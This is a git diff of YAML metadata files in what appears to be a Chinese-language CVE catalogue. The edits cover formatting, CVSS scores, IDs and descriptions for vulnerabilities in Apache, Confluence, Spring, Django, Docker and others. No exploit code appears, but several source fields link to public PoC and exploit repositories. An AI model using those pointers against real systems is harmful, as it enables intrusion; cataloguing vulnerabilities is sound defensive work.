tags: cve2021,Apache,目录遍历 \ No newline at end of file + tags: cve2021, Apache, 目录遍历 \ No newline at end of file diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml index 25ad6322..87bc94c6 100644 --- a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml +++ b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml @@ -6,7 +6,7 @@ info: description: | Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。 scope-of-influence: - Apache HTTP = 2.4.49, Apache HTTP = 2.4.50 + 2.4.49 ≤ Apache HTTP ≤ 2.4.50 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - https://httpd.apache.org/security/vulnerabilities_24.html @@ -17,4 +17,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: cve2021,Apache,目录遍历,RCE \ No newline at end of file + tags: cve2021, Apache, 目录遍历, RCE \ No newline at end of file diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml index 16b59c30..dc2f24c5 100644 --- a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml +++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml @@ -5,7 +5,6 @@ info: severity: critical description: CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 - scope-of-influence: Apache OFBiz < 17.12.06 reference: diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml index 12fb0f1a..702f229f 100644 --- a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml +++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml @@ -6,7 +6,7 @@ info: description: | 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。 scope-of-influence: - Apache Shiro 1.9.1之前 + Apache Shiro < 1.9.1 reference: - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh - https://nvd.nist.gov/vuln/detail/CVE-2022-32532 @@ -14,10 +14,10 @@ info: - https://cxsecurity.com/cveshow/CVE-2022-32532/ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32532 cwe-id: CWE-863 - cnvd-id: CNNVD-202206-2750 + cnvd-id: None kve-id: None tags: 旁路授权 \ No newline at end of file diff --git a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml index 4b8f08c3..e1ca89c0 100644 --- a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml +++ b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml @@ -16,5 +16,4 @@ info: cwe-id: CWE-502 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml index d66c1fe0..8ff102a1 100644 --- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml +++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml @@ -16,5 +16,4 @@ info: cwe-id: CWE-20 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml index e1e4a6e8..d33a68ae 100644 --- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -20,5 +20,4 @@ info: cwe-id: CWE-1321 cnvd-id: None kve-id: None - tags: - - 远程命令执行 + tags: 远程命令执行 diff --git a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml index b10e9d5a..c47208c8 100644 --- a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml +++ b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml @@ -2,7 +2,7 @@ id: CVE-2021-27905 source: https://github.com/Henry4E36/Solr-SSRF info: name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 - severity: high + severity: Critical description: Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。 scope-of-influence: @@ -11,9 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://security.netapp.com/advisory/ntap-20210611-0009/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-27905 - cnvd-id: CNNVD-202104-914 + cwe-id: CWE-918 + cnvd-id: None kve-id: None - tags: cve2021,Apache,Solr,SSRF + tags: cve2021, Apache, Solr, SSRF diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml index a8c37b12..c9e57971 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml @@ -15,7 +15,7 @@ info: - https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ - https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-13935 cwe-id: CWE-835 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml index 38a9cc6c..0f7d54ed 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml @@ -1,7 +1,7 @@ id: CVE-2020-1938 source: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat info: - name: Java 是目前 Web 开发中主流的编程语言,而 Tomcat 是当前流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 + name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: critical description: Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml index e4cf2843..ccee2312 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml @@ -1,7 +1,7 @@ id: CVE-2020-9484 source: https://github.com/RepublicR0K/CVE-2020-9484 info: - name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 + name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 severity: high description: 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 diff --git a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml index 869c3135..9d0a4149 100644 --- a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml +++ b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml @@ -1,7 +1,7 @@ id: CVE-2022-29885 source: https://github.com/quynhlab/CVE-2022-29885 info: - name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载,从而触发拒绝服务。 + name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: high description: 当Tomcat开启集群配置,且通过NioReceiver通信时,无论服务端是否配置EncryptInterceptor,攻击者均可构造特制请求导致目标服务器拒绝服务。 diff --git a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml index 7cd008cb..9ec1f93a 100644 --- a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml +++ b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml @@ -1,6 +1,5 @@ id: CVE-2020-13942 -source: - None +source: None info: name: Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。 severity: critical diff --git a/cve/confluence/2019/yaml/CVE-2019-3394.yaml b/cve/confluence/2019/yaml/CVE-2019-3394.yaml index b79454ab..00527937 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3394.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3394.yaml @@ -1,6 +1,5 @@ id: CVE-2019-3394 -source: - none +source: none info: name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。 severity: high diff --git a/cve/confluence/2019/yaml/CVE-2019-3396.yaml b/cve/confluence/2019/yaml/CVE-2019-3396.yaml index e91ff6d3..8cbe8d8e 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3396.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3396.yaml @@ -1,5 +1,5 @@ id: CVE-2019-3396 -source: +source: https://github.com/Yt1g3r/CVE-2019-3396_EXP info: name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。 severity: critical @@ -20,4 +20,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: RCE,cve2019,任意文件读取 \ No newline at end of file + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file diff --git a/cve/confluence/2021/yaml/CVE-2021-26084.yaml b/cve/confluence/2021/yaml/CVE-2021-26084.yaml index ae6294f5..c90bd51e 100644 --- a/cve/confluence/2021/yaml/CVE-2021-26084.yaml +++ b/cve/confluence/2021/yaml/CVE-2021-26084.yaml @@ -47,4 +47,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2021,OGNI注入 \ No newline at end of file + tags: RCE, cve2021, OGNI注入 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26134.yaml b/cve/confluence/2022/yaml/CVE-2022-26134.yaml index 76029829..0c760728 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26134.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26134.yaml @@ -24,4 +24,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26138.yaml b/cve/confluence/2022/yaml/CVE-2022-26138.yaml index d399d06b..9b39b96c 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26138.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26138.yaml @@ -1,6 +1,5 @@ id: CVE-2022-26138 -source: - https://github.com/shavchen/CVE-2022-26138 +source: https://github.com/shavchen/CVE-2022-26138 info: name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/django/2021/yaml/CVE-2021-31542.yaml b/cve/django/2021/yaml/CVE-2021-31542.yaml index f4db55bd..d70c7c63 100644 --- a/cve/django/2021/yaml/CVE-2021-31542.yaml +++ b/cve/django/2021/yaml/CVE-2021-31542.yaml @@ -1,6 +1,5 @@ id: CVE-2021-31542 -source: - https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md +source: https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: high diff --git a/cve/django/2022/yaml/CVE-2022-28346.yaml b/cve/django/2022/yaml/CVE-2022-28346.yaml index 739255ff..4a569da5 100644 --- a/cve/django/2022/yaml/CVE-2022-28346.yaml +++ b/cve/django/2022/yaml/CVE-2022-28346.yaml @@ -1,6 +1,5 @@ id: CVE-2022-28346 -source: - https://github.com/DeEpinGh0st/CVE-2022-28346 +source: https://github.com/DeEpinGh0st/CVE-2022-28346 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/django/2022/yaml/CVE-2022-34265.yaml b/cve/django/2022/yaml/CVE-2022-34265.yaml index ff899811..48efa4d1 100644 --- a/cve/django/2022/yaml/CVE-2022-34265.yaml +++ b/cve/django/2022/yaml/CVE-2022-34265.yaml @@ -1,6 +1,5 @@ id: CVE-2022-34265 -source: - https://github.com/aeyesec/CVE-2022-34265 +source: https://github.com/aeyesec/CVE-2022-34265 info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: critical diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/docker/2019/CVE-2019-16884/ReadMe.md similarity index 100% rename from cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md rename to cve/docker/2019/CVE-2019-16884/ReadMe.md diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/docker/2019/yaml/CVE-2019-16884.yaml similarity index 70% rename from cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml rename to cve/docker/2019/yaml/CVE-2019-16884.yaml index 0f38b714..5cd9d93f 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/docker/2019/yaml/CVE-2019-16884.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16884 source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md info: - name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 severity: high description: | runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory @@ -12,11 +12,11 @@ info: Red Hat OpenShift Container Platform 4.2 Red Hat OpenShift Container Platform 3.9 reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 - - https://usn.ubuntu.com/usn/usn-4297-1 - - https://security.netapp.com/advisory/ntap-20220221-0004/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 + - https://usn.ubuntu.com/usn/usn-4297-1 + - https://security.netapp.com/advisory/ntap-20220221-0004/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2019-16884 cwe-id: CWE-863 diff --git a/cve/docker/2019/yaml/CVE-2019-5736.yaml b/cve/docker/2019/yaml/CVE-2019-5736.yaml index fefd75ac..ac62cd4c 100644 --- a/cve/docker/2019/yaml/CVE-2019-5736.yaml +++ b/cve/docker/2019/yaml/CVE-2019-5736.yaml @@ -10,7 +10,7 @@ info: RunC version <=1.0-rc6 reference: - https://www.4hou.com/vulnerable/16361.html - - https://github.com/Frichetten/CVE-2019-5736-PoC\ + - https://github.com/Frichetten/CVE-2019-5736-PoC classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 8.6 @@ -18,4 +18,4 @@ info: cwe-id: CWE-78 cnvd-id: None kve-id: None - tags: cve2019,docker.runc \ No newline at end of file + tags: cve2019, docker.runc \ No newline at end of file diff --git a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml index 98f30f02..6774e501 100644 --- a/cve/fortinac/2022/yaml/CVE-2022-39952.yaml +++ b/cve/fortinac/2022/yaml/CVE-2022-39952.yaml @@ -19,7 +19,7 @@ info: - https://www.fortiguard.com/psirt/FG-IR-22-300 - https://nvd.nist.gov/vuln/detail/CVE-2022-39952 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-39952 cwe-id: CWE-610 diff --git a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml index e3d36c9d..3ef4584f 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22205.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22205.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-94 cnvd-id: None kve-id: None - tags: RCE,cve2021,gitlab \ No newline at end of file + tags: RCE, cve2021, gitlab \ No newline at end of file diff --git a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml index 37a69cb5..1ba01452 100644 --- a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml +++ b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml @@ -14,7 +14,7 @@ info: - https://www.tenable.com/plugins/nessus/152483 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2021-22214 cwe-id: CWE-918 diff --git a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml index 7d7575e2..3baa322f 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-1162.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-1162.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: UseOfHardCodedPassword,cve2022,gitlab \ No newline at end of file + tags: UseOfHardCodedPassword, cve2022, gitlab \ No newline at end of file diff --git a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml index 430b5e70..ba1e0879 100644 --- a/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml +++ b/cve/java-spring-security/2022/yaml/CVE-2022-22978.yaml @@ -1,6 +1,5 @@ id: CVE-2022-22978 -source: - https://github.com/DeEpinGh0st/CVE-2022-22978 +source: https://github.com/DeEpinGh0st/CVE-2022-22978 info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。 severity: critical @@ -13,7 +12,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-22978 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22978 cwe-id: CWE-863, CWE-285 diff --git a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml index c6b5f608..6cc798ff 100644 --- a/cve/java-spring/2017/yaml/CVE-2017-8046.yaml +++ b/cve/java-spring/2017/yaml/CVE-2017-8046.yaml @@ -1,6 +1,5 @@ id: CVE-2017-8046 -source: - https://github.com/m3ssap0/spring-break_cve-2017-8046 +source: https://github.com/m3ssap0/spring-break_cve-2017-8046 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high @@ -12,7 +11,7 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8046 cwe-id: CWE-20 diff --git a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml index ef202c2e..0838f504 100644 --- a/cve/java-spring/2020/yaml/CVE-2020-5398.yaml +++ b/cve/java-spring/2020/yaml/CVE-2020-5398.yaml @@ -1,6 +1,5 @@ id: CVE-2020-5398 -source: - https://github.com/motikan2010/CVE-2020-5398 +source: https://github.com/motikan2010/CVE-2020-5398 info: name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。 severity: high @@ -14,7 +13,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-5398 - https://pivotal.io/security/cve-2020-5398 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.5 cve-id: CVE-2020-5398 cwe-id: CWE-494, CWE-79 diff --git a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml index 496e1ad2..251d88ac 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22963.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22963.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。 - scope-of-influence: Spring Cloud Function<3.1.7 + scope-of-influence: + Spring Cloud Function<3.1.7 reference: - https://github.com/dinosn/CVE-2022-22963 - https://avd.aliyun.com/search?q=CVE-2022-22963 diff --git a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml index e237d738..c7aca8ce 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-22965.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-22965.yaml @@ -4,7 +4,8 @@ info: name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 severity: critical description: 2022年3月31日,Spring官方发布安全公告,披露CVE-2022-22965 Spring Framework 远程代码执行漏洞。由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。 - scope-of-influence: Spring Framework <5.2.20 and JDK >=9 + scope-of-influence: + Spring Framework <5.2.20 and JDK >=9 reference: - https://help.aliyun.com/noticelist/articleid/1061022382.html - https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement diff --git a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml index d6ed1a5e..2cf4e7e3 100644 --- a/cve/java-spring/2022/yaml/CVE-2022-31692.yaml +++ b/cve/java-spring/2022/yaml/CVE-2022-31692.yaml @@ -4,7 +4,8 @@ info: name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。它提供了一组可以在Spring应用上下文中配置的Bean,充分利用了Spring IoC,DI(控制反转Inversion of Control ,DI:Dependency Injection 依赖注入)和AOP(面向切面编程)功能,为应用系统提供声明式的安全访问控制功能,减少了为企业系统安全控制编写大量重复代码的工作。 severity: critical description: CVE-2022-31692 中,在Spring Security受影响版本范围内,在使用forward/include进行转发的情况下可能导致权限绕过。 - scope-of-influence: 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 + scope-of-influence: + 5.7.0 <= Spring Security <= 5.7.4, 5.6.0 <= Spring Security <= 5.6.8 reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-31692 - https://github.com/ARPSyndicate/cvemon diff --git a/cve/joomla/2023/yaml/CVE-2023-23752.yaml b/cve/joomla/2023/yaml/CVE-2023-23752.yaml index 40166d53..a8b610b7 100644 --- a/cve/joomla/2023/yaml/CVE-2023-23752.yaml +++ b/cve/joomla/2023/yaml/CVE-2023-23752.yaml @@ -1,6 +1,5 @@ id: CVE-2023-23752 -source: - https://github.com/Jenderal92/Joomla-CVE-2023-23752 +source: https://github.com/Jenderal92/Joomla-CVE-2023-23752 info: name: Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可。 severity: medium @@ -17,5 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: - - 非法访问 \ No newline at end of file + tags: 非法访问 \ No newline at end of file diff --git a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml index edf411d2..53eb7456 100644 --- a/cve/libxml2/2020/yaml/CVE-2020-24977.yaml +++ b/cve/libxml2/2020/yaml/CVE-2020-24977.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2020,缓冲区错误 \ No newline at end of file + tags: cve2020, 缓冲区错误 \ No newline at end of file diff --git a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml index d215f84e..82c243eb 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3517.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3517.yaml @@ -6,7 +6,7 @@ info: description: | libxml2 中entities.c存在缓冲区错误漏洞,该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。 scope-of-influence: - + libxml2< v2.9.11 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3517 classification: @@ -16,4 +16,4 @@ info: cwe-id: CWE-787 cnvd-id: None kve-id: None - tags: cve2021,缓冲区错误 \ No newline at end of file + tags: cve2021, 缓冲区错误 \ No newline at end of file diff --git a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml index 54dd1885..33a05a16 100644 --- a/cve/libxml2/2021/yaml/CVE-2021-3518.yaml +++ b/cve/libxml2/2021/yaml/CVE-2021-3518.yaml @@ -6,7 